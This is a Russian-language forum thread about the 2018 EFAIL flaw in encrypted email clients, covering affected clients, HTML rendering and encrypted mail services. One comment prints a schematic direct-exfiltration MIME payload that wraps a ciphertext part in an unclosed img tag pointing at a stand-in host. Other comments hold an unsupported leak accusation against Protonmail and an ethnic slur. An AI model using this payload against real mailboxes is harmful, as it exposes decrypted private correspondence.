  • +/
    > Уже нету
    > https://efail.de/

    Ждём посадок.

     
     
  • 5.68, Ураган, 15:24, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • –1 +/
    На бутыль?
     
  • 1.41, Аноним, 12:52, 14/05/2018 [ответить] [смотреть все]    [к модератору]  
  • –2 +/
    А какое шифрование используется в почте safe-mail.net и tutanota?
     
     
  • 2.42, Аноним, 12:54, 14/05/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • –1 +/
    Никакое.
     
  • 2.85, Darth Vader, 18:03, 14/05/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +1 +/
    Use Protonmail, Luke!
     
     
  • 3.87, Аноним, 18:10, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    Они хохлам всё сливали. Не вариант.
     
     
  • 4.112, Анонимус2333, 21:27, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    А где про это можно почитать? Ссылкой поделитесь, пожалуйста.
     
  • 2.93, Аноним, 19:31, 14/05/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    тоже самое что и у протона, вроде - опенпгп на жс Учитывая что закрытые ключи э... весь текст скрыт [показать] [показать ветку]
     
  • 1.54, Аноним, 13:54, 14/05/2018 [ответить] [смотреть все]     [к модератору]  
  • +/
    Интересно как это отразиться на каком-нибудь Mutt ... весь текст скрыт [показать]
     
     
  • 2.69, alex53, 16:37, 14/05/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +/
    На mutt сам по себе - никак Проблемы будут только если для написания писем буде... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.119, КО, 23:21, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    И даже в этом случае в нормальном клиенте не страшно - ибо его html по умолчанию он в инет не выходит.
     
  • 1.56, Аноним, 14:07, 14/05/2018 [ответить] [смотреть все]    [к модератору]  
  • +/
    Пока вы тут комментите, уже подробности опубликовали:
    https://efail.de/
     
     
  • 2.71, annual slayer, 16:41, 14/05/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +/
    с логотипом уже, кстати ;)
     
  • 1.70, Аноним, 16:38, 14/05/2018 [ответить] [смотреть все]     [к модератору]  
  • +/
    Ну дык дырявые клиенты, дырявый HTML, а не сами GPG и GPG4win Ручками вставлять... весь текст скрыт [показать]
     
     
  • 2.77, Аноним, 17:35, 14/05/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • –2 +/
    Думаешь в самом GPG нет дыр? Верить в идеальность софта в 2018?
     
  • 1.95, Аноним, 19:32, 14/05/2018 [ответить] [смотреть все]     [к модератору]  
  • +/
    пересылать конфиденциальную инфу в хтмл - ссзб... весь текст скрыт [показать]
     
     
  • 2.97, Аноним84701, 20:23, 14/05/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +/
    >>только писем, переданных в формате HTML
    > пересылать конфиденциальную инфу в хтмл - ссзб

    Не пересылать в HTML не поможет. Поможет не расшифровывать или же не рендерить (альтернативно: не допускать при этом никаких внешних запросов).
    См. вполне доходчивый пример:
    https://efail.de/ (Direct Exfiltration)

    Кстати, как и ожидалось - Claws и Мutt  (ну и еще несколько менее удобных, второстепенных клиентов) уязвимости не подвержены :)

     
     
  • 3.98, arisu, 20:29, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    поможет чудесный маленький фильтр, который html-мусор выкидывает. вместе со всем письмом.
     
     
  • 4.100, Аноним, 20:41, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +1 +/
    Интересно, а в случае HTML не прокатит внаглую скриптом читать содержимое хтмылк... весь текст скрыт [показать]
     
     
  • 5.101, arisu, 20:55, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    > Интересно, а в случае HTML не прокатит внаглую скриптом читать содержимое хтмылки
    > и скидывать его в ремотный канал? Так, глядя на это безобразие.

    зависит от криворукости авторов клиентов. в принципе, все нормальные клиенты должны запрещать такие шутки… но с другой стороны: нормальные люди не пишут клиентов с поддержкой html в письмах.

     
  • 5.107, Аноним84701, 21:10, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    > Интересно, а в случае HTML не прокатит внаглую скриптом читать содержимое хтмылки
    > и скидывать его в ремотный канал? Так, глядя на это безобразие.

    А смысл?
    Принципиально расшифровка и leak делаются вот так:
    [CODE]
    Content-Type: text/html
    <img src="https://foo.bar/
    --BOUNDARY--
    Content-Type: application/pksc7-mime:
    Foo:bar
    ENCRYPTED MSG // сюда можно подставить любое содержимое, т.е. из тех же текствоых писем
    --BOUNDARY--
    Content-Type: text/html
    ">
    --BOUNDARY--
    [/CODE]
    т.е. все достаточно  просто.  
    А JS все же обычно по умолчанию режется/отключен (вроде бы thunderbird с версии 3, аутлук, гмейл), из-за спама и прочих "радостей".

     
  • 1.99, Аноним, 20:37, 14/05/2018 [ответить] [смотреть все]     [к модератору]  
  • +/
    А, ну это еще не так страшно ... весь текст скрыт [показать]
     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2018 by Maxim Chirkov  
    ДобавитьПоддержатьВебмастеруГИД  
    Hosting by Ihor